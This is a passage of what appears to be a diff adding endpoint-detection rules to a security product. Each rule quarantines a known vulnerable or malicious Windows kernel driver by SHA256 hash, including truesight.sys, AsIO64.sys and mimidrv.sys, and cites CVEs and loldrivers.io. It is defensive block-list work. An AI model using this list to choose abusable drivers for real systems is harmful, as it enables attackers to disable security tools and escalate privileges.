+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821826Z",
+ "creation_date": "2026-03-23T11:45:31.821829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821837Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b7c14dd71837e42450aafee5c7bb67d4badd203616f1b2e73591a154ac16ce6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fe70913-7db9-5caf-aa16-093c73b405cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977125Z",
+ "creation_date": "2026-03-23T11:45:29.977127Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977134Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf69704755ec2643dfd245ae1d4e15d77f306aeb1a576ffa159453de1a7345cb",
+ "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0feaa0c1-2405-590d-856e-b953fff47696",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156723Z",
+ "creation_date": "2026-03-23T11:45:31.156725Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156731Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6ddce3ee843569abcdb06523dc5031394bcb971a645922eaeb85a462b72188c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ff1da40-e272-5b75-a9f0-c560dfe8123a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609920Z",
+ "creation_date": "2026-03-23T11:45:29.609922Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609927Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1622ac0c618a86be17e0f97daa061f9aaa0e721dc0fd30d76bbc5c958e9a9d92",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ff21dd9-50d9-56fc-a27e-7854969d326c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493681Z",
+ "creation_date": "2026-03-23T11:45:31.493684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493692Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa50f18e1db46b6ddabd195f67745eb38dd0f68bea634ab8a64350d81e3d4734",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0fffa5ff-208c-500e-b7b5-40d00c7cbcdc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813825Z",
+ "creation_date": "2026-03-23T11:45:31.813827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c25dceb5b12dcb45cd96abcaac829fabd3078ba24b732efb31194af3b79dad8d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "100325ea-73a3-5f97-be11-5609d3d465ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145737Z",
+ "creation_date": "2026-03-23T11:45:32.145739Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "668c5bead3c7fcd919afd742ede7e5fe07972dc4cf730ff37deabdd22d88de4a",
+ "comment": "Malicious Kernel Driver (aka driver_668c5bea.sys) [https://www.loldrivers.io/drivers/04eefdf4-448d-45bb-87fc-93f263fc77f4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10045882-2ed4-55fb-962a-6aee1926e65f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815097Z",
+ "creation_date": "2026-03-23T11:45:31.815100Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bba8e6906541aed6406438a7a27f4e3d8e603a325449b0cc17df53d1d0db8329",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "100abf05-0ca9-53bc-9994-30a704e0020a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463299Z",
+ "creation_date": "2026-03-23T11:45:30.463302Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463311Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0a27ac1a8173413de13860d2b2e34cb6bc4d1149f94b62d319042e11d8b004c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10108155-f204-5434-ad7c-a0e750f86310",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829483Z",
+ "creation_date": "2026-03-23T11:45:30.829485Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d29c7bd3f007bde4776866ccf377eb222673009ac0280948fd704a525f6515ec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1017936e-446a-5fd9-b643-5290e67ca045",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454269Z",
+ "creation_date": "2026-03-23T11:45:30.454273Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454282Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7462b7ae48ae9469474222d4df2f0c4f72cdef7f3a69a524d4fccc5ed0fd343f",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1022da3e-ab26-53be-ade5-83f022a87076",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827822Z",
+ "creation_date": "2026-03-23T11:45:31.827824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827830Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ada441e68a3291303ed191fc670a8e2521b8e83a7008ee789335a8a0d62af825",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "102df2d2-d0c4-5934-89e3-fe76d74cec09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621368Z",
+ "creation_date": "2026-03-23T11:45:29.621374Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "191689c53195dbe828f406b206cb167dcd4671ecdab32b80e01c885f706a6baf",
+ "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "103c8f1f-9c70-5eaf-83ae-0a4dd214d667",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830013Z",
+ "creation_date": "2026-03-23T11:45:31.830015Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830021Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e256508f576243d58cf038eb0db38cb9573b4d5adedb35a07e0925ea4032623",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "103e5409-ed39-5f42-9b81-0a0f09b73c8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481169Z",
+ "creation_date": "2026-03-23T11:45:30.481171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb91e05733244a23f741a299e5e4a57836685a8f45366e690bc30b4befc02b14",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "104e8a15-8afb-5a2d-a85e-cf64aa59bcac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820698Z",
+ "creation_date": "2026-03-23T11:45:31.820701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820710Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1402f071112c6f5c5fd4dd1aa31f03ad56b5e771c4de1fb54be75096cd3c2b40",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1066e54f-9e28-5c3d-bb31-61f4d2e169c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140970Z",
+ "creation_date": "2026-03-23T11:45:31.140972Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140978Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8494ecde84bbed336833d05e100e17873f3eab95f4dc676274cf072e6d758f3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10731df9-0b81-51f4-99f7-34199a58c987",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982140Z",
+ "creation_date": "2026-03-23T11:45:29.982142Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982147Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d969845ef6acc8e5d3421a7ce7e244f419989710871313b04148f9b322751e5d",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "10758e24-d69a-5e75-86ab-812ae70129e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972284Z",
+ "creation_date": "2026-03-23T11:45:29.972286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972291Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ae3c446e5f075e8fc3db31eabd744a65b2c50a9b4a52877873547951bc19bc9",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "107dea3e-fe98-5414-bb9b-b95be19fb94d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498469Z",
+ "creation_date": "2026-03-23T11:45:31.498472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498480Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a1c37bda3fc4ad8a5ccd3c5e0af179314a43b7294180ecc0fbedefa96701c59",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1084ffbf-3e2b-52b6-9946-0aa18d1f6f1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157049Z",
+ "creation_date": "2026-03-23T11:45:31.157051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157057Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f2cdadbbf1072dcba6ef07bf3ef3a9e24a77b9401970a5cc4fa5bbe77c315f5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1087ce96-0757-5619-a841-810173fed890",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621755Z",
+ "creation_date": "2026-03-23T11:45:29.621757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621764Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c7ad854f6670452d7da064d4b429eb90c42155b6f7eaa52ee471d9ee8b61e6f",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "108a7c91-008b-5f1b-9462-a7c65103d067",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808649Z",
+ "creation_date": "2026-03-23T11:45:31.808651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
